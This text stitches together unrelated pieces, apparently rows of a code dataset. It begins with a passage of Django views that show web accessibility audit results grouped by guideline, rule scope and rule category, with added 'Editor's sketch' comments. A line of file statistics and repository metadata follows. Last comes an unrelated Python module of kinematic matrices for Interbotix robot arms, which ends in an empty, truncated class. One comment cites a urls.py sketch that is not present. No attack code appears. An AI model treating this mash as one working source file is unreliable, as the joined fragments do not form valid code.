self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.set_rule(rule_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_result'] = agr
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_result'] = prr
context['rule'] = r
return context
# ================
# Rule Group Views
# ================
class GroupRuleGroupResultsView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
ar = AuditResult.objects.get(slug=result_slug)
if rule_grouping == 'gl':
argr = AuditGuidelineResult.objects.get(audit_result=ar, slug=rule_group_slug)
agrs = AuditGroupGuidelineResult.objects.filter(group_result__audit_result=ar, slug=rule_group_slug)
rule_group = Guideline.objects.get(slug=rule_group_slug)
elif rule_grouping == 'rs':
argr = AuditRuleScopeResult.objects.get(audit_result=ar, slug=rule_group_slug)
agrs = AuditGroupRuleScopeResult.objects.filter(group_result__audit_result=ar, slug=rule_group_slug)
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
argr = AuditRuleCategoryResult.objects.get(audit_result=ar, slug=rule_group_slug)
agrs = AuditGroupRuleCategoryResult.objects.filter(group_result__audit_result=ar, slug=rule_group_slug)
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for agr in agrs:
agr.title = agr.group_result.get_title()
agr.href = reverse('group_rule_group_results_audit_group', args=[result_slug, rule_grouping, rule_group_slug, agr.group_result.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['rule_group_result'] = argr
context['audit_group_results'] = agrs
return context
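# Editor's sketch (a possible refactor, not the project's code): the
# gl/rs/rc branching repeated across these views could be collapsed into a
# single lookup keyed by the rule_grouping slug, e.g.:
#
#   RULE_GROUP_MODELS = {'gl': Guideline, 'rs': RuleScope, 'rc': RuleCategory}
#
#   def get_rule_group(rule_grouping, rule_group_slug):
#       model = RULE_GROUP_MODELS.get(rule_grouping, RuleCategory)
#       return model.objects.get(slug=rule_group_slug)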
class GroupRuleGroupResultsAuditGroupView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
if rule_grouping == 'gl':
agrgr = AuditGroupGuidelineResult.objects.get(group_result=agr, slug=rule_group_slug)
ag2rgrs = AuditGroup2GuidelineResult.objects.filter(group2_result__group_result=agr, slug=rule_group_slug)
wsrgrs = WebsiteGuidelineResult.objects.filter(ws_report__group_result=agr, slug=rule_group_slug)
rule_group = Guideline.objects.get(slug=rule_group_slug)
elif rule_grouping == 'rs':
agrgr = AuditGroupRuleScopeResult.objects.get(group_result=agr, slug=rule_group_slug)
ag2rgrs = AuditGroup2RuleScopeResult.objects.filter(group2_result__group_result=agr, slug=rule_group_slug)
wsrgrs = WebsiteRuleScopeResult.objects.filter(ws_report__group_result=agr, slug=rule_group_slug)
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:  # rule_grouping == 'rc'
agrgr = AuditGroupRuleCategoryResult.objects.get(group_result=agr, slug=rule_group_slug)
ag2rgrs = AuditGroup2RuleCategoryResult.objects.filter(group2_result__group_result=agr, slug=rule_group_slug)
wsrgrs = WebsiteRuleCategoryResult.objects.filter(ws_report__group_result=agr, slug=rule_group_slug)
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for ag2rgr in ag2rgrs:
ag2rgr.title = ag2rgr.get_title()
ag2rgr.website_count = ag2rgr.get_website_count()
ag2rgr.page_count = ag2rgr.get_page_count()
ag2rgr.href = reverse('group_rule_group_results_audit_group_audit_group2', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, ag2rgr.group2_result.slug])
for wsrgr in wsrgrs:
wsrgr.title = wsrgr.get_title()
wsrgr.group_title = wsrgr.get_group_title()
wsrgr.group2_title = wsrgr.get_group2_title()
wsrgr.page_count = wsrgr.get_page_count()
wsrgr.href = reverse('group_rule_group_results_audit_group_website', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, wsrgr.ws_report.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_results'] = ag2rgrs
context['audit_group_result'] = agrgr
context['website_results'] = wsrgrs
return context
# =================================
# Rule grouping audit group 2 views
# =================================
class GroupRuleGroupResultsAuditGroupAuditGroup2View(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_audit_group2.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupAuditGroup2View, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
ag2r = AuditGroup2Result.objects.get(group_result=agr, slug=audit_group2_slug)
if rule_grouping == 'gl':
ag2rgr = AuditGroup2GuidelineResult.objects.get(group2_result=ag2r, slug=rule_group_slug)
wsrgrs = WebsiteGuidelineResult.objects.filter(ws_report__group2_result=ag2r, slug=rule_group_slug)
rule_group = Guideline.objects.get(slug=rule_group_slug)
elif rule_grouping == 'rs':
ag2rgr = AuditGroup2RuleScopeResult.objects.get(group2_result=ag2r, slug=rule_group_slug)
wsrgrs = WebsiteRuleScopeResult.objects.filter(ws_report__group2_result=ag2r, slug=rule_group_slug)
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:  # rule_grouping == 'rc'
ag2rgr = AuditGroup2RuleCategoryResult.objects.get(group2_result=ag2r, slug=rule_group_slug)
wsrgrs = WebsiteRuleCategoryResult.objects.filter(ws_report__group2_result=ag2r, slug=rule_group_slug)
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for wsrgr in wsrgrs:
wsrgr.title = wsrgr.get_title()
wsrgr.group_title = wsrgr.get_group_title()
wsrgr.group2_title = wsrgr.get_group2_title()
wsrgr.page_count = wsrgr.get_page_count()
wsrgr.href = reverse('group_rule_group_results_audit_group_audit_group2_website', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, audit_group2_slug, wsrgr.ws_report.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2rgr
context['website_results'] = wsrgrs
return context
class GroupRuleGroupResultsAuditGroupAuditGroup2WebsiteView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_audit_group2_website.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupAuditGroup2WebsiteView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
ag2r = AuditGroup2Result.objects.get(group_result=agr, slug=audit_group2_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
if rule_grouping == 'gl':
wsrgr = wsr.ws_gl_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_gl_results.all()
rule_group = Guideline.objects.get(slug=rule_group_slug)
elif rule_grouping == 'rs':
wsrgr = wsr.ws_rs_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_rs_results.all()
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:  # rule_grouping == 'rc'
wsrgr = wsr.ws_rc_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_rc_results.all()
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for pgrgr in pgrgrs:
pgrgr.title = pgrgr.get_title()
pgrgr.page_num = pgrgr.get_page_number()
pgrgr.href = reverse('group_rule_group_results_audit_group_audit_group2_website_page', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, audit_group2_slug, website_slug, pgrgr.get_page_number()])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_result'] = wsr
context['page_results'] = pgrgrs
return context
class GroupRuleGroupResultsAuditGroupAuditGroup2WebsitePageView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_audit_group2_website_page.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupAuditGroup2WebsitePageView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
ag2r = AuditGroup2Result.objects.get(group_result=agr, slug=audit_group2_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
pgr = PageResult.objects.get(ws_report=wsr, page_number=page_num)
if rule_grouping == 'gl':
pgrg = pgr.page_gl_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = Guideline.objects.get(slug=rule_group_slug)
elif rule_grouping == 'rs':
pgrg = pgr.page_rs_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:  # rule_grouping == 'rc'
pgrg = pgr.page_rc_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for pgrr in pgrrs:
pgrr.title = pgrr.rule.summary_html
pgrr.href = reverse('group_rule_group_results_audit_group_audit_group2_website_page_rule', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, audit_group2_slug, website_slug, page_num, pgrr.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug, page_num)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_result'] = wsr
context['page_result'] = pgr
context['page_rule_results'] = pgrrs
return context
class GroupRuleGroupResultsAuditGroupAuditGroup2WebsitePageRuleView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_audit_group2_website_page_rule.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupAuditGroup2WebsitePageRuleView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
rule_slug = kwargs['rule_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prr = pr.page_rule_results.get(slug=rule_slug)
r = prr.rule
if rule_grouping == 'gl':
rule_group = Guideline.objects.get(slug=rule_group_slug)
elif rule_grouping == 'rs':
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:  # rule_grouping == 'rc'
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.set_rule(rule_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_result'] = prr
context['rule'] = r
return context
# ===========================
# Rule grouping website views
# ===========================
class GroupRuleGroupResultsAuditGroupWebsiteView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_website.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupWebsiteView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
if rule_grouping == 'gl':
wsrgr = wsr.ws_gl_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_gl_results.all()
rule_group = Guideline.objects.get(slug=rule_group_slug)
elif rule_grouping == 'rs':
wsrgr = wsr.ws_rs_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_rs_results.all()
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:  # rule_grouping == 'rc'
wsrgr = wsr.ws_rc_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_rc_results.all()
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for pgrgr in pgrgrs:
pgrgr.title = pgrgr.get_title()
pgrgr.page_num = pgrgr.get_page_number()
pgrgr.href = reverse('group_rule_group_results_audit_group_website_page', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, website_slug, pgrgr.get_page_number()])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['website_result'] = wsr
context['page_results'] = pgrgrs
return context
class GroupRuleGroupResultsAuditGroupWebsitePageView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_website_page.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupWebsitePageView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
pgr = PageResult.objects.get(ws_report=wsr, page_number=page_num)
if rule_grouping == 'gl':
pgrg = pgr.page_gl_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = Guideline.objects.get(slug=rule_group_slug)
elif rule_grouping == 'rs':
pgrg = pgr.page_rs_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:  # rule_grouping == 'rc'
pgrg = pgr.page_rc_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for pgrr in pgrrs:
pgrr.title = pgrr.rule.summary_html
pgrr.href = reverse('group_rule_group_results_audit_group_website_page_rule', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, website_slug, page_num, pgrr.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug, page_num)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['website_result'] = wsr
context['page_result'] = pgr
context['page_rule_results'] = pgrrs
return context
class GroupRuleGroupResultsAuditGroupWebsitePageRuleView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_website_page_rule.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupWebsitePageRuleView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
rule_slug = kwargs['rule_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prr = pr.page_rule_results.get(slug=rule_slug)
r = prr.rule
if rule_grouping == 'gl':
rule_group = Guideline.objects.get(slug=rule_group_slug)
elif rule_grouping == 'rs':
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:  # rule_grouping == 'rc'
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.set_rule(rule_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
context['rule_slug'] = rule_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_result'] = prr
context['rule'] = r
return context
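# Editor's sketch (illustrative smoke test; assumes a fixture providing an
# AuditResult with slug 'demo' and a URL name 'group_results' as wired in the
# hypothetical urls.py sketched earlier):
#
#   from django.test import TestCase
#   from django.urls import reverse
#
#   class GroupResultsViewTests(TestCase):
#       fixtures = ['demo_audit.json']
#
#       def test_group_results_renders(self):
#           resp = self.client.get(reverse('group_results', args=['demo', 'rc']))
#           self.assertEqual(resp.status_code, 200)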
| 43.949868 | 230 | 0.665806 | 5,721 | 49,971 | 5.477189 | 0.040552 | 0.062326 | 0.045221 | 0.034722 | 0.84921 | 0.844104 | 0.836126 | 0.828435 | 0.826488 | 0.81768 | 0 | 0.005349 | 0.240499 | 49,971 | 1,136 | 231 | 43.988556 | 0.820278 | 0.050289 | 0 | 0.810644 | 0 | 0 | 0.131573 | 0.041099 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022277 | false | 0 | 0.055693 | 0 | 0.144802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
322cc797910aaad8d54c704fe980308195bb63cd | 6,580 | py | Python | interbotix_xs_toolbox/interbotix_xs_modules/src/interbotix_xs_modules/mr_descriptions.py | Drojas251/interbotix_ros_toolboxes | 212d1fbdad4019dd628e029ef1a8493a04b795cb | [
"BSD-2-Clause"
] | 8 | 2021-08-24T15:27:33.000Z | 2022-03-13T10:44:54.000Z | interbotix_xs_toolbox/interbotix_xs_modules/src/interbotix_xs_modules/mr_descriptions.py | Drojas251/interbotix_ros_toolboxes | 212d1fbdad4019dd628e029ef1a8493a04b795cb | [
"BSD-2-Clause"
] | 4 | 2021-07-26T18:42:05.000Z | 2022-02-15T17:23:18.000Z | interbotix_xs_toolbox/interbotix_xs_modules/src/interbotix_xs_modules/mr_descriptions.py | Drojas251/interbotix_ros_toolboxes | 212d1fbdad4019dd628e029ef1a8493a04b795cb | [
"BSD-2-Clause"
] | 9 | 2021-06-03T08:12:04.000Z | 2022-02-16T01:53:24.000Z | # Modern Robotics Descriptions for all various Interbotix Arms.
# Note that the end-effector is positioned at '<robot_name>/ee_gripper_link'
# and that the Space frame is positioned at '<robot_name>/base_link'.
import numpy as np
class px100:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.0931, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.1931, 0.0, 0.035],
[0.0, 1.0, 0.0, -0.1931, 0.0, 0.135]]).T
M = np.array([[1.0, 0.0, 0.0, 0.248575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.1931],
[0.0, 0.0, 0.0, 1.0]])
class px150:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.10457, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.25457, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.25457, 0.0, 0.2],
[1.0, 0.0, 0.0, 0.0, 0.25457, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.358575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.25457],
[0.0, 0.0, 0.0, 1.0]])
class rx150:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.10457, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.25457, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.25457, 0.0, 0.2],
[1.0, 0.0, 0.0, 0.0, 0.25457, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.358575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.25457],
[0.0, 0.0, 0.0, 1.0]])
class rx200:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.10457, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.30457, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.30457, 0.0, 0.25],
[1.0, 0.0, 0.0, 0.0, 0.30457, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.408575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.30457],
[0.0, 0.0, 0.0, 1.0]])
class vx250:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.12705, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.37705, 0.0, 0.06],
[0.0, 1.0, 0.0, -0.37705, 0.0, 0.31],
[1.0, 0.0, 0.0, 0.0, 0.37705, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.468575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.37705],
[0.0, 0.0, 0.0, 1.0]])
class vx300:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.12705, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.42705, 0.0, 0.05955],
[0.0, 1.0, 0.0, -0.42705, 0.0, 0.35955],
[1.0, 0.0, 0.0, 0.0, 0.42705, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.536494],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.42705],
[0.0, 0.0, 0.0, 1.0]])
class vx300s:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.12705, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.42705, 0.0, 0.05955],
[1.0, 0.0, 0.0, 0.0, 0.42705, 0.0],
[0.0, 1.0, 0.0, -0.42705, 0.0, 0.35955],
[1.0, 0.0, 0.0, 0.0, 0.42705, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.536494],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.42705],
[0.0, 0.0, 0.0, 1.0]])
class wx200:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.11065, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.31065, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.31065, 0.0, 0.25],
[1.0, 0.0, 0.0, 0.0, 0.31065, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.408575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.31065],
[0.0, 0.0, 0.0, 1.0]])
class wx250:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.11065, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.36065, 0.0, 0.04975],
[0.0, 1.0, 0.0, -0.36065, 0.0, 0.29975],
[1.0, 0.0, 0.0, 0.0, 0.36065, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.458325],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.36065],
[0.0, 0.0, 0.0, 1.0]])
class wx250s:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.11065, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.36065, 0.0, 0.04975],
[1.0, 0.0, 0.0, 0.0, 0.36065, 0.0],
[0.0, 1.0, 0.0, -0.36065, 0.0, 0.29975],
[1.0, 0.0, 0.0, 0.0, 0.36065, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.458325],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.36065],
[0.0, 0.0, 0.0, 1.0]])
class mobile_px100:
